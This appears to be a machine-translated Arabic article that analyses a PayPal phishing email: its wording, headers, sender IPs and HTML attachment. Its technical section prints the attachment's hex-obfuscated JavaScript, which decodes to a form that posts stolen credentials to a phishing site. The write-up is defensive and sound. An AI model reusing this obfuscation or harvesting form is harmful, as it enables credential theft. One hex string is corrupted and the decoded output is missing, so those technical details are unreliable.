الأمان عبر الإنترنت: تحليل تشريح البريد الإلكتروني المخادع


في عالم اليوم حيث تكون معلومات الجميع عبر الإنترنت ، يعد التصيد الاحتيالي أحد أكثر الهجمات شيوعًا وتدميرًا على الإنترنت ، لأنه يمكنك دائمًا التخلص من الفيروسات ، ولكن إذا تمت سرقة بياناتك المصرفية ، فأنت في مشكلة. فيما يلي تفصيل لواحد من هذه الهجمات التي تلقيناها.



لا تعتقد أن مجرد التفاصيل المصرفية الخاصة بك مهمة: بعد كل شيء ، إذا تمكن شخص ما من التحكم في تسجيل الدخول إلى حسابك ، فلن يعرف فقط المعلومات الواردة في هذا الحساب ، ولكن الاحتمالات هي أن معلومات تسجيل الدخول نفسها يمكن استخدامها في العديد من الحسابات الأخرى. حسابات. وإذا قاموا باختراق حساب البريد الإلكتروني الخاص بك ، فيمكنهم إعادة تعيين جميع كلمات المرور الأخرى الخاصة بك.

لذا ، بالإضافة إلى الاحتفاظ بكلمات مرور قوية ومتنوعة ، عليك أن تكون دائمًا على اطلاع على رسائل البريد الإلكتروني الوهمية التي تتنكر على أنها شيء حقيقي. في حين أن معظم التصيد المحاولات غير اعتيادية ، وبعضها مقنع تمامًا ، لذا من المهم فهم كيفية التعرف عليها على مستوى السطح وكذلك كيفية عملها تحت الغطاء.





ذات صلة: لماذا يتهجون التصيد باستخدام 'الرقم الهيدروجيني'؟ تكريم غير محتمل

مصدر الصورة اسيراب



فحص ما هو في مرأى من الجميع

يُخطرك البريد الإلكتروني كمثال ، مثل معظم محاولات التصيد الاحتيالي ، بالنشاط على حساب PayPal الخاص بك والذي سيكون ، في ظل الظروف العادية ، مقلقًا. لذا فإن دعوة العمل هي التحقق من حسابك / استعادته من خلال إرسال كل جزء من المعلومات الشخصية التي يمكنك التفكير فيها. مرة أخرى ، هذه صيغة جميلة.

على الرغم من وجود استثناءات بالتأكيد ، يتم تحميل كل بريد إلكتروني احتيالي وخداع إلى حد كبير بعلامات حمراء مباشرة في الرسالة نفسها. حتى لو كان النص مقنعًا ، يمكنك عادةً العثور على العديد من الأخطاء المنتشرة في جميع أنحاء نص الرسالة والتي تشير إلى أن الرسالة ليست شرعية.

نص الرسالة



الإعلانات

للوهلة الأولى ، هذه واحدة من أفضل رسائل التصيد الاحتيالي التي رأيتها. لا توجد أخطاء إملائية أو نحوية ويقرأ الكلام وفقًا لما قد تتوقعه. ومع ذلك ، هناك بعض العلامات الحمراء التي يمكنك رؤيتها عند فحص المحتوى عن كثب.

  • Paypal - الحالة الصحيحة هي PayPal (رأس المال P). يمكنك رؤية كلا الصيغتين مستخدمة في الرسالة. الشركات متعمدة للغاية بشأن علاماتها التجارية ، لذلك من المشكوك فيه أن شيئًا كهذا قد يجتاز عملية التدقيق.
  • السماح لـ ActiveX - كم مرة رأيت نشاطًا تجاريًا شرعيًا قائمًا على الويب بحجم Paypal يستخدم مكونًا خاصًا يعمل فقط على متصفح واحد ، خاصةً عندما يدعم متصفحات متعددة؟ بالتأكيد ، في مكان ما هناك بعض الشركات تفعل ذلك ، لكن هذه علامة حمراء.
  • بأمان. - لاحظ كيف أن هذه الكلمة لا تصطف في الهامش مع باقي نص الفقرة. حتى لو قمت بمد النافذة أكثر قليلاً ، فإنها لا تلتف أو تتسع بشكل صحيح.
  • باي بال! - المساحة الموجودة قبل علامة التعجب تبدو غير ملائمة. مجرد نزوة أخرى وأنا متأكد من أنها لن تكون في بريد إلكتروني شرعي.
  • PayPal- Account Update Form.pdf.htm - لماذا يقوم Paypal بإرفاق ملف PDF خاصةً عندما يمكنه فقط الارتباط بصفحة على موقعه؟ بالإضافة إلى ذلك ، لماذا يحاولون إخفاء ملف HTML كملف PDF؟ هذا هو أكبر علم أحمر لهم جميعا.

رأس الرسالة

عندما تلقي نظرة على عنوان الرسالة ، تظهر علامتان تحمران أكثر:

  • عنوان من هو test@test.com .
  • العنوان المطلوب مفقود. لم أقم بإفراغ هذا الأمر ، فهو ببساطة ليس جزءًا من عنوان الرسالة القياسي. عادةً ما تقوم الشركة التي تحمل اسمك بتخصيص البريد الإلكتروني لك.

التعلق

عندما أقوم بفتح المرفق ، يمكنك أن ترى على الفور أن التخطيط غير صحيح لأنه يفتقد إلى معلومات النمط. مرة أخرى ، لماذا يقوم PayPal بإرسال نموذج HTML بالبريد الإلكتروني بينما يمكنه ببساطة إعطائك رابطًا على موقعه؟

ملحوظة: استخدمنا عارض مرفقات HTML المدمج في Gmail لهذا الغرض ، لكننا نوصي بعدم فتح المرفقات من المحتالين. مطلقا. أبدا. غالبًا ما تحتوي على ثغرات تقوم بتثبيت أحصنة طروادة على جهاز الكمبيوتر الخاص بك لسرقة معلومات حسابك.

بالتمرير لأسفل قليلاً ، يمكنك أن ترى أن هذا النموذج لا يطلب فقط معلومات تسجيل الدخول إلى PayPal الخاصة بنا ، ولكن عن المعلومات المصرفية وبطاقة الائتمان أيضًا. بعض الصور تالفة.

من الواضح أن محاولة التصيد هذه تسعى وراء كل شيء بضربة واحدة.

الانهيار الفني

في حين أنه يجب أن يكون واضحًا استنادًا إلى ما هو واضح أن هذه محاولة تصيد ، سنقوم الآن بتفكيك التركيب الفني للبريد الإلكتروني ومعرفة ما يمكننا العثور عليه.

معلومات من المرفق

الإعلانات

أول شيء يجب إلقاء نظرة عليه هو مصدر HTML الخاص بنموذج المرفق وهو ما يرسل البيانات إلى الموقع الزائف.

عند عرض المصدر بسرعة ، تظهر جميع الروابط صالحة لأنها تشير إلى paypal.com أو paypalobjects.com وكلاهما شرعي.

سنلقي الآن نظرة على بعض معلومات الصفحة الأساسية التي يجمعها Firefox على الصفحة.

كما ترى ، تم سحب بعض الرسومات من المجالات blessedtobe.com و goodhealthpharmacy.com و pic-upload.de بدلاً من مجالات PayPal الشرعية.

معلومات من رؤوس البريد الإلكتروني

بعد ذلك سنلقي نظرة على رؤوس رسائل البريد الإلكتروني الأولية. يتيح Gmail هذا عبر خيار إظهار القائمة الأصلية في الرسالة.

الإعلانات

بالنظر إلى معلومات رأس الرسالة الأصلية ، يمكنك رؤية هذه الرسالة تم تكوينها باستخدام Outlook Express 6. أشك في أن لدى PayPal شخصًا ما في فريق العمل يقوم بإرسال كل من هذه الرسائل يدويًا عبر عميل بريد إلكتروني قديم.

الآن بالنظر إلى معلومات التوجيه ، يمكننا رؤية عنوان IP لكل من المرسل وخادم البريد المرحل.

عنوان IP للمستخدم هو المرسل الأصلي. عند إجراء بحث سريع على معلومات IP ، يمكننا أن نرى عنوان IP المرسل في ألمانيا.

وعندما ننظر إلى خادم البريد المرسل (mail.itak.at) ، عنوان IP يمكننا أن نرى أن هذا هو مزود خدمة الإنترنت ومقره النمسا. أشك في أن PayPal يوجه رسائل البريد الإلكتروني الخاصة بهم مباشرة من خلال مزود خدمة الإنترنت في النمسا عندما يكون لديهم مزرعة خوادم ضخمة يمكنها التعامل مع هذه المهمة بسهولة.

أين تذهب البيانات؟

لذلك قررنا بوضوح أن هذه رسالة بريد إلكتروني تصيدية وجمعنا بعض المعلومات حول مصدر الرسالة ، ولكن ماذا عن مكان إرسال بياناتك؟

لرؤية هذا ، يتعين علينا أولاً حفظ مرفق HTM على سطح المكتب الخاص بنا وفتحه في محرر نصوص. بالتمرير خلالها ، يبدو أن كل شيء على ما يرام إلا عندما نصل إلى كتلة جافا سكريبت تبدو مشبوهة.

الإعلانات

كسر المصدر الكامل للكتلة الأخيرة من جافا سكريبت ، نرى:


// حقوق النشر © 2005 Voormedia - WWW.VOORMEDIA.COM
var i، y، x = 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474708a2f2f5777772e646e4657670؛

في أي وقت ترى سلسلة كبيرة مختلطة من الأحرف والأرقام العشوائية على ما يبدو مضمنة في كتلة جافا سكريبت ، فعادة ما يكون ذلك شيئًا مريبًا. بالنظر إلى الكود ، يتم تعيين المتغير x على هذه السلسلة الكبيرة ثم يتم فك تشفيره في المتغير y. تتم كتابة النتيجة النهائية للمتغير y في المستند بتنسيق HTML.

نظرًا لأن السلسلة الكبيرة تتكون من الأرقام من 0 إلى 9 والأحرف من a إلى f ، فمن المرجح أن يتم ترميزها عبر تحويل ASCII بسيط إلى Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

يترجم إلى:

وليس من قبيل المصادفة أن يتم فك هذا الرمز إلى علامة نموذج HTML صالحة والتي ترسل النتائج ليس إلى PayPal ، ولكن إلى موقع مخادع.

بالإضافة إلى ذلك ، عند عرض مصدر HTML للنموذج ، سترى أن علامة النموذج هذه غير مرئية لأنها يتم إنشاؤها ديناميكيًا عبر Javascript. هذه طريقة ذكية لإخفاء ما يفعله HTML في الواقع إذا قام شخص ما بعرض المصدر الذي تم إنشاؤه للمرفق (كما فعلنا سابقًا) بدلاً من فتح المرفق مباشرةً في محرر نصي.

عند تشغيل whois سريعًا على الموقع المخالف ، يمكننا أن نرى أن هذا مجال مستضاف على مضيف ويب شهير ، 1and1.

الإعلانات

ما يبرز هو أن المجال يستخدم اسمًا قابلاً للقراءة (على عكس شيء مثل dfh3sjhskjhw.net) وقد تم تسجيل المجال لمدة 4 سنوات. لهذا السبب ، أعتقد أن هذا المجال قد تم اختطافه واستخدامه كبيدق في محاولة التصيد الاحتيالي هذه.

السخرية دفاع جيد

عندما يتعلق الأمر بالبقاء آمنًا على الإنترنت ، فلا ضير في أن يكون لديك قدر كبير من السخرية.

بينما أنا متأكد من وجود المزيد من العلامات الحمراء في مثال البريد الإلكتروني ، فإن ما أشرنا إليه أعلاه هو المؤشرات التي رأيناها بعد بضع دقائق فقط من الفحص. من الناحية الافتراضية ، إذا كان المستوى السطحي للبريد الإلكتروني يحاكي نظيره الشرعي بنسبة 100٪ ، فإن التحليل الفني سيظل يكشف عن طبيعته الحقيقية. هذا هو السبب في أنه من الأهمية بمكان أن تكون قادرًا على فحص ما يمكنك وما لا يمكنك رؤيته.

اقرأ التالي

مقالات مثيرة للاهتمام